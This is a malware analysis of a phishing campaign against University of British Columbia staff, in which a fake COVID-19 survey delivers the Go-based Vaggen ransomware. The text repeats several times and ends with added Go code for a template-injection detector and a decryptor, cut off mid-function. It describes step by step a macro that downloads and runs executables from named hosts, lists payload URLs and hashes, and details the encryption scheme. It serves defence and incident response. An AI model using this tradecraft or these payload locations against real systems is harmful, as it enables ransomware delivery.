identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 259 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 260 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 261 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 262 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 263 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 264 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 265 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 266 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 267 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims who want to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether the launch succeeded (on success, the return value is the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.\r\nThis can be very useful as an early warning system that an intruder has gained access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content: because the key is embedded in the binary and the nonce and tag are stored alongside the ciphertext, no per-victim secret is needed for decryption.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 306 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 307 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 308 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 309 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 310 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 311 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 312 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 313 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 314 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 315 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
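The decoy .docx carries no macro of its own; the injection is a relationship inside the package that tells Word to fetch an external template when the file is opened. The Go program below is an added example (not Malwarebytes’ code and not taken from the campaign) that triages a .docx for that indicator: it reads word/_rels/settings.xml.rels and reports every attachedTemplate relationship whose target is External and is not a file: URI, because Word records a legitimate local template such as Normal.dotm as an External file:/// target as well. The two sample documents are constructed in memory, and the notabug.org URL is hypothetical, since the post does not print the actual path of template.dotm. A hit means only that a remote template is declared, not that the template contains a macro; the .dotm itself still has to be fetched in a sandbox and inspected.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// attachedTemplateType is the relationship Word uses for the template a document
// is attached to; template injection points its Target at a remote .dotm instead.
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

type relationship struct {
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	Items []relationship `xml:"Relationship"`
}

// remoteTemplates returns every attachedTemplate target in a .docx (given as bytes)
// that is External and not a file: URI, i.e. an http(s) URL or UNC path. Word stores
// a benign local template as an External file:/// target, so External alone is no indicator.
func remoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML zip container: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if f.Name != "word/_rels/settings.xml.rels" { // the attached template is declared here
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("malformed settings.xml.rels: %w", err)
		}
		for _, r := range rels.Items {
			if r.Type != attachedTemplateType || r.TargetMode != "External" {
				continue
			}
			if !strings.HasPrefix(strings.ToLower(r.Target), "file:") {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// buildSampleDocx assembles a minimal constructed .docx in memory (not a sample from
// the campaign) whose settings relationships declare an attached template at target.
func buildSampleDocx(target string) []byte {
	rels := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>
</Relationships>`, attachedTemplateType, target)
	parts := map[string]string{
		"word/document.xml":            `<?xml version="1.0"?><document/>`,
		"word/settings.xml":            `<?xml version="1.0"?><settings/>`,
		"word/_rels/settings.xml.rels": rels,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		if _, err := w.Write([]byte(body)); err != nil {
			panic(err)
		}
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	// Hypothetical URL standing in for the notabug.org path the post does not print.
	injected := buildSampleDocx("https://notabug.org/example-user/example-repo/raw/master/template.dotm")
	benign := buildSampleDocx("file:///C:/Users/victim/AppData/Roaming/Microsoft/Templates/Normal.dotm")
	for _, doc := range [][]byte{injected, benign} {
		hits, err := remoteTemplates(doc)
		fmt.Println(hits, err)
	}
}
```

Run it with go run: the injected sample prints the remote URL and the benign one prints an empty list. To triage real files, read them with os.ReadFile and pass the bytes to remoteTemplates. Other external relationships (for example oleObject or image targets in word/_rels/document.xml.rels) are separate lures that this check does not cover.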
The template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe:
  notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe:
  notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the VBA Shell function to execute Killar.exe
- Checks the return value of Shell to see whether it was successful (the return value is the task ID of the executed application)
- If successful, sends an HTTP GET request to:
  canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it is not successful, sends an HTTP GET request to:
  canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document (and letting the template’s macro run) will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs. It can be very useful as an early warning that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the library xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
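The scheme described here and in the next paragraph (AES-256 in GCM mode, a 32-byte hardcoded key, a random 12-byte nonce, gcm.Seal output written out as nonce, ciphertext, tag) is reproduced below in Go as an added example; it is neither the malware’s code nor Malwarebytes’ decryptor. It uses the key the post recovered from the binary, replaces CryptGenRandom with crypto/rand, and assumes the on-disk order nonce, ciphertext, tag exactly as the post lists it. recoverTree walks a directory the way the malware’s filepath.Walk callback did, in reverse: every *.VAGGEN file is decrypted next to itself and the encrypted original is kept. The victim file is constructed. Because GCM authenticates the data, a sample from a build with a different key or layout fails the tag check instead of decrypting to garbage, which is the check to run before trusting any decryptor on a victim’s files.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// vaggenKey is the 32-byte key the post recovered from the binary; 32 bytes selects AES-256.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const nonceSize, tagSize = 12, 16 // standard GCM nonce and tag lengths, as the post describes
const extension = ".VAGGEN"       // appended to every encrypted file

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// sealVaggen writes the layout the post describes: nonce, then gcm.Seal's output
// (ciphertext followed by the 16-byte tag). The nonce is a parameter so a round trip
// can be checked deterministically; main draws a fresh one from crypto/rand.
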